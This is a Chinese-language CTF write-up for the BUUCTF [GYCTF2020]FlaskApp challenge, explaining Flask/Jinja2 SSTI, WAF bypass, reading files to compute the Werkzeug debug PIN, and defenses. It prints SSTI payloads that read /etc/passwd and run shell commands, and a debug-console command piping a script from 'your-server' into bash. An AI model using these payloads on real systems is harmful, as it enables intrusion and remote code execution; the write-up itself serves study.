当前位置: 首页 > article >正文

BUUCTF-[GYCTF2020]FlaskApp 从SSTI到PIN码生成的完整利用链分析

1. SSTI漏洞基础与Flask应用风险Flask作为轻量级Python Web框架开发者常因模板渲染不当引发SSTI服务器端模板注入。我在实际测试中发现当用户输入直接拼接到模板时比如render_template_string(request.args.get(input))攻击者就能注入模板语法。去年审计某企业系统时就遇到过用{{7*7}}测试返回49的典型案例。Flask的Jinja2引擎默认沙箱并不能完全防御SSTI。通过__class__属性链可以突破限制{{ .__class__.__mro__[1].__subclasses__() }}这条payload能获取所有Python内置类就像拿到了整个系统的钥匙串。我曾用这个方法在测试环境找到了os._wrap_close类进而执行系统命令。2. 漏洞利用链的完整构建2.1 初始漏洞触发点分析题目中的/decode路由存在典型漏洞模式text_decode base64.b64decode(text.encode()) render_template_string(tmp) # 未过滤用户输入当传入{{config}}的base64编码时会直接泄露Flask配置。我建议测试时先用{{config}}和{{request.environ}}快速验证漏洞这两个就像汽车的安全气囊指示灯能立即确认漏洞存在。2.2 绕过WAF的实战技巧题目中的WAF过滤了星号(*)但允许其他运算符。在最近某次渗透中我遇到类似限制时改用{{request[application][__globals__][__builtins__][__import__](os)}}通过字符串拼接和属性链访问绕过。对于本题原作者使用的\x63\x61\x74十六进制编码也是经典手法就像把敏感词拆解成拼音首字母。3. PIN码生成六要素获取详解3.1 关键信息收集步骤Flask调试模式PIN码需要六个要素就像保险箱的六位密码用户名通过读取/etc/passwd获取。我常用这个payload{{.__class__.__base__.__subclasses__()[132].__init__.__globals__[__builtins__].open(/etc/passwd).read()}}注意catch_warnings类的索引号可能随Python版本变化建议先用循环遍历确认。MAC地址转换获取/sys/class/net/eth0/address后需要去除冒号并转十进制。记得有一次我漏了转换步骤导致PIN码计算失败排查了两小时才发现。3.2 机器码的特殊处理/etc/machine-id和/proc/sys/kernel/random/boot_id都可能被使用。在Docker环境中测试时发现某些系统会缺少这些文件此时需要尝试读取{{config.__class__.__init__.__globals__[os].popen(cat /proc/self/cgroup).read()}}最近帮朋友复现漏洞时就遇到机器码存储在/var/lib/dbus/machine-id的情况。4. PIN码生成算法深度解析4.1 核心计算逻辑Flask的PIN生成算法像调制秘方import hashlib from itertools import chain probably_public_bits [ flaskweb, # 实际需要替换为获取的用户名 flask.app, Flask, /usr/local/lib/python3.7/site-packages/flask/app.py # 注意路径可能不同 ] private_bits [ 95148118271306, # MAC地址十进制 1408f836b0ca514d796cbf8960e45fa1 # machine_id ]算法会将这些参数与salt组合进行MD5哈希。有次我输错了路径中的python3.7为python3.8导致生成的PIN无效提醒大家路径必须精确到字节。4.2 调试接口利用成功计算PIN后访问/console输入PIN即可获得Python shell。这里有个实用技巧import os os.popen(curl http://your-server/shell.sh | bash).read()建议先测试os.listdir(/)确认权限我曾遇到过容器环境权限受限的情况。5. 防御方案与实战建议5.1 安全开发规范永远使用render_template替代render_template_string必须实现严格的输入过滤from jinja2 import escape text_decode escape(base64.b64decode(text.encode()))生产环境务必设置DEBUGFalse就像离开家要锁门一样基础5.2 渗透测试技巧对于CTF类题目我习惯的测试流程是用{{config}}确认SSTI查找可用的内置类常关注catch_warnings和_wrap_close逐步收集PIN六要素使用计算器脚本生成PIN有个容易忽略的点Flask版本差异会影响PIN生成逻辑。去年就遇到过Flask 1.0和2.0生成的PIN不同建议测试时先确认版本号。

相关文章:

BUUCTF-[GYCTF2020]FlaskApp 从SSTI到PIN码生成的完整利用链分析

1. SSTI漏洞基础与Flask应用风险 Flask作为轻量级Python Web框架,开发者常因模板渲染不当引发SSTI(服务器端模板注入)。我在实际测试中发现,当用户输入直接拼接到模板时,比如render_template_string(request.args.get(…...

Dial2硬件传感器适配库:嵌入式固件的契约实现层

1. 项目概述 Dial2HardwareSensors 是一个面向 AhmsVille Dial 2 硬件平台的专用传感器适配层实现库。该库不提供抽象接口定义,而是聚焦于在真实嵌入式硬件上完成传感器驱动的最终落地——即把 AhmsVille Dial2 sensor adapter interfaces (通常为纯虚…...

CSS如何实现卡片式布局_掌握盒模型阴影与间距设置

box-shadow 要清晰自然需控制偏移与模糊比例,避免与 border 冲突;文字不被遮挡需确保无误设 z-index 或 overflow: hidden;padding 管内距、margin 管外距;Flex 中用 flex: 1 0 300px 防缩窄;border-radius 与 shadow …...

JavaScript中CSSContain属性减少DOM局部重排范围

CSS contain属性是浏览器优化机制,通过声明元素自包含来限制重排重绘范围;支持layout、paint、style等值,strict为最强隔离,JavaScript可动态设置但需注意兼容性与使用陷阱。CSS Contain 属性本身不是 JavaScript 的属性&#xff…...

构建企业级工业可视化监控系统:FUXA在生产环境的高效部署方案

构建企业级工业可视化监控系统:FUXA在生产环境的高效部署方案 【免费下载链接】FUXA Web-based Process Visualization (SCADA/HMI/Dashboard) software 项目地址: https://gitcode.com/gh_mirrors/fu/FUXA 在数字化转型浪潮中,工业企业面临设备数…...

Python怎么生成迭代器_iter与next方法原理解释与自定义

__iter__ 必须返回带__next__的对象,因迭代器协议要求分离可迭代对象与迭代器;直接返回值会触发TypeError。为什么 __iter__ 必须返回一个带 __next__ 的对象,而不是直接返回值?因为迭代器协议要求分离「可迭代对象」和「迭代器本…...

天天流鼻血,是否会把身体血都流光?

天天流鼻血,每次都能弄湿好几张纸巾,这种反复的出血确实让人揪心。我能理解你对身体变化的担忧,尤其是之前检查正常,现在却持续出血,难免会怀疑:是不是身体悄悄发生了变化? 核心结论‌:‌凝血功能在短期内一般不会突然恶化,但长期反复失血、潜在疾病进展或药物影响等…...

3步让老Mac焕发新生:OpenCore Legacy Patcher终极升级指南

3步让老Mac焕发新生:OpenCore Legacy Patcher终极升级指南 【免费下载链接】OpenCore-Legacy-Patcher Experience macOS just like before 项目地址: https://gitcode.com/GitHub_Trending/op/OpenCore-Legacy-Patcher 你是否还在为老Mac无法升级到最新macOS…...

Java实战系列(1):基于ShardingSphere Hint策略实现SpringBoot多数据源动态路由

1. ShardingSphere Hint策略的核心价值 在实际业务开发中,我们经常会遇到需要动态切换数据源的场景。比如电商系统中,用户数据和订单数据可能分布在不同的数据库实例;SaaS应用中,不同租户的数据需要隔离存储。传统做法是通过手动切…...

Agent Client Protocol 全景解析手

1. 核心概念 在 Antigravity 中,技能系统分为两层: Skills (全局库):实际的代码、脚本和指南,存储在系统级目录(如 ~/.gemini/antigravity/skills)。它们是“能力”的本体。 Workflows (项目级)&#xff1a…...

鸿蒙应用开发实战:5分钟搞定versionCode、versionName等关键信息获取

鸿蒙应用开发实战:5分钟掌握应用关键信息获取技巧 在鸿蒙应用开发过程中,获取应用的版本信息、包名等关键数据是开发者的高频需求。无论是用于版本更新检测、应用内展示,还是配合后端接口校验,这些信息都扮演着重要角色。本文将带…...

UOS家庭版21.2上搞定SecureCRT 9.1.1:从依赖缺失到串口权限,一篇讲透所有坑

UOS家庭版21.2上搞定SecureCRT 9.1.1:从依赖缺失到串口权限,一篇讲透所有坑 在国产操作系统UOS家庭版21.2上安装商业软件SecureCRT,看似简单的过程却暗藏玄机。不同于常见的Ubuntu或Debian系统,UOS虽然基于Debian架构,…...

SSD1289 TFT-LCD驱动开发:面向AUTOSAR与Cariad平台的嵌入式显示适配

1. SSD1289显示驱动库技术解析:面向Cariad平台的TFT-LCD底层适配实践SSD1289是Solomon Systech(现属Silicon Motion)推出的高性能16位并行接口TFT-LCD控制器芯片,广泛应用于工业HMI、车载信息娱乐系统(IVI)…...

Gemagic Design X坐标对齐:平整与不平整表面的精准处理方案

1. 为什么X坐标对齐在Gemagic Design中如此重要? 在三维设计领域,坐标对齐就像建筑工地上的水平仪,是确保所有元素精准定位的基础。我做过一个智能家居外壳的设计项目,就因为初期忽略了X坐标对齐,导致后期3D打印时多个…...

Pixel Dream Workshop应用场景:像素风格UI组件库(按钮/滑块/图标)生成

Pixel Dream Workshop应用场景:像素风格UI组件库(按钮/滑块/图标)生成 1. 像素艺术生成新纪元 在数字产品设计领域,像素艺术正经历着令人振奋的复兴。Pixel Dream Workshop作为新一代AI像素艺术生成工具,为设计师和开…...

S2-Pro集成开发环境搭建:VSCode远程连接与调试指南

S2-Pro集成开发环境搭建:VSCode远程连接与调试指南 1. 为什么需要远程开发环境 当你开始使用S2-Pro这类大模型时,本地电脑的性能往往难以满足需求。GPU服务器提供了强大的计算能力,但直接在服务器上开发又不够方便。这就是为什么我们需要搭…...

DXVK深度解析:彻底解决GTA IV在Linux平台的纹理模糊问题终极指南

DXVK深度解析:彻底解决GTA IV在Linux平台的纹理模糊问题终极指南 【免费下载链接】dxvk Vulkan-based implementation of D3D8, 9, 10 and 11 for Linux / Wine 项目地址: https://gitcode.com/gh_mirrors/dx/dxvk DXVK是一个基于Vulkan的D3D8、9、10和11实现…...

c++如何将图片读入内存_二进制方式读取jpg与png【附代码】

最稳妥做法是用 std::ifstream 以 binaryate 模式读取 JPG/PNG 到 std::vector<unsigned char>&#xff0c;需显式指定二进制标志、正确获取文件大小并校验读取字节数&#xff0c;避免文本模式干扰、内存越界及路径编码问题。用 std::ifstream 以二进制方式读取 JPG/PNG …...

2026届必备的六大AI科研助手推荐

Ai论文网站排名&#xff08;开题报告、文献综述、降aigc率、降重综合对比&#xff09; TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 作为智能写作工具的DeepSeek&#xff0c;能在论文撰写里起到辅助功效。使用者得明确自身学术…...

(手把手实战指南)利用NoneBot2与QQ官方API,从零构建智能群聊机器人

1. 环境准备与项目初始化 想要搭建一个QQ群聊机器人&#xff0c;首先需要准备好开发环境。我推荐使用Python 3.8版本&#xff0c;这是目前NoneBot2最稳定的支持版本。如果你还没有安装Python&#xff0c;可以去官网下载最新版本。 安装好Python后&#xff0c;我们需要创建一个虚…...

从付费软件到自主开发:我用AI和FFmpeg实现了一个录屏工具粱

我为什么会发出这个疑问呢&#xff1f;是因为我研究Web开发中的一个问题时&#xff0c;HTTP请求体在 Filter&#xff08;过滤器&#xff09;处被读取了之后&#xff0c;在 Controller&#xff08;控制层&#xff09;就读不到值了&#xff0c;使用 RequestBody 的时候。 无论是字…...

Americhem于Chinaplas 2026宣布在华新增投资,进一步拓展其全球医疗健康业务版图

全球领先的高分子材料解决方案提供商Americhem今日宣布&#xff0c;通过在中国苏州新建一座洁净复合材料生产设施&#xff0c;进一步强化其在医疗健康领域的能力&#xff1b;同时&#xff0c;公司还将在Chinaplas 2026展会上推出多项先进材料技术。该设施预计将于2026年下半年投…...

深入S7协议栈:从TPKT、COTP到PDU,手把手用Wireshark抓包分析Java通信全过程

深入S7协议栈&#xff1a;从TPKT、COTP到PDU&#xff0c;手把手用Wireshark抓包分析Java通信全过程 工业自动化领域&#xff0c;西门子S7协议作为PLC通信的事实标准&#xff0c;其底层协议栈的复杂性常常让开发者望而生畏。当基于Java的iot-communication库与西门子PLC通信出现…...

Fan-Out晶圆级封装(FOWLP)的三种工艺对比:面朝上、面朝下、RDL-first,哪种更适合你的芯片?

Fan-Out晶圆级封装&#xff08;FOWLP&#xff09;的三种工艺对比&#xff1a;面朝上、面朝下、RDL-first&#xff0c;哪种更适合你的芯片&#xff1f; 在半导体封装领域&#xff0c;Fan-Out晶圆级封装&#xff08;FOWLP&#xff09;技术正逐渐成为高性能芯片的首选方案。这种技…...

信托资金流向与交易对手辨析:钱给了谁,谁就是交易对手吗?

目录 一、 核心误区&#xff1a;资金流向 ≠ 交易对手 二、 谁才是真正的“交易对手”&#xff1f; 三、 如何一眼识别真正的交易对手&#xff1f; 总结 在信托业务和资产管理领域&#xff0c;很多初学者甚至从业者容易产生一个误区&#xff1a;认为信托公司把钱打给谁&…...

2026年软件测试十大趋势预测:AI将重塑一切?

站在质效革命的十字路口当软件从静态工具进化为驱动社会运转的智能神经中枢&#xff0c;其复杂性与不确定性呈指数级增长。传统质量保障体系正经历系统性重构&#xff0c;AI的深度渗透、开发范式的升维以及业务对极致体验的追求&#xff0c;共同推动软件测试迈入“质效革命”新…...

LabVIEW开发的TestStand多工位并行测试框架:支持独立测试、序列编辑与参数编辑功能...

labview 编写的类teststand多工位并行测试框架&#xff0c;带单独的测试和序列编辑&#xff0c;参数编辑功能&#xff0c;具体的见图片&#xff0c;功能正常&#xff0c;多工位测试&#xff0c;带源码最近在捣鼓一个用LabVIEW编写的类TestStand多工位并行测试框架&#xff0c;感…...

EoH Platform:嵌入式多协议物联网边缘中间件

1. EoH Platform 概述&#xff1a;面向工业物联网的多协议嵌入式中间件平台 EoH Platform&#xff08;Edge of Hub Platform&#xff09;并非传统意义上的单功能驱动库或轻量级协议栈&#xff0c;而是一个专为资源受限嵌入式设备设计的 可裁剪、可扩展、协议无关的物联网边缘中…...

AD22100K温度传感器嵌入式驱动设计与ADC信号链优化

1. OSS-EC_ADI_AD22100K_00000057 温度传感器驱动库深度解析1.1 器件特性与工程定位OSS-EC_ADI_AD22100K_00000057 是面向 Analog Devices AD22100K 集成温度传感器的嵌入式软件驱动库。该库并非通用型传感器框架&#xff0c;而是针对 AD22100K 独特模拟输出特性的专用适配层&a…...

RVC变声器终极教程:10分钟训练高质量AI音色模型完全指南

RVC变声器终极教程&#xff1a;10分钟训练高质量AI音色模型完全指南 【免费下载链接】Retrieval-based-Voice-Conversion-WebUI Easily train a good VC model with voice data < 10 mins! 项目地址: https://gitcode.com/GitHub_Trending/re/Retrieval-based-Voice-Conve…...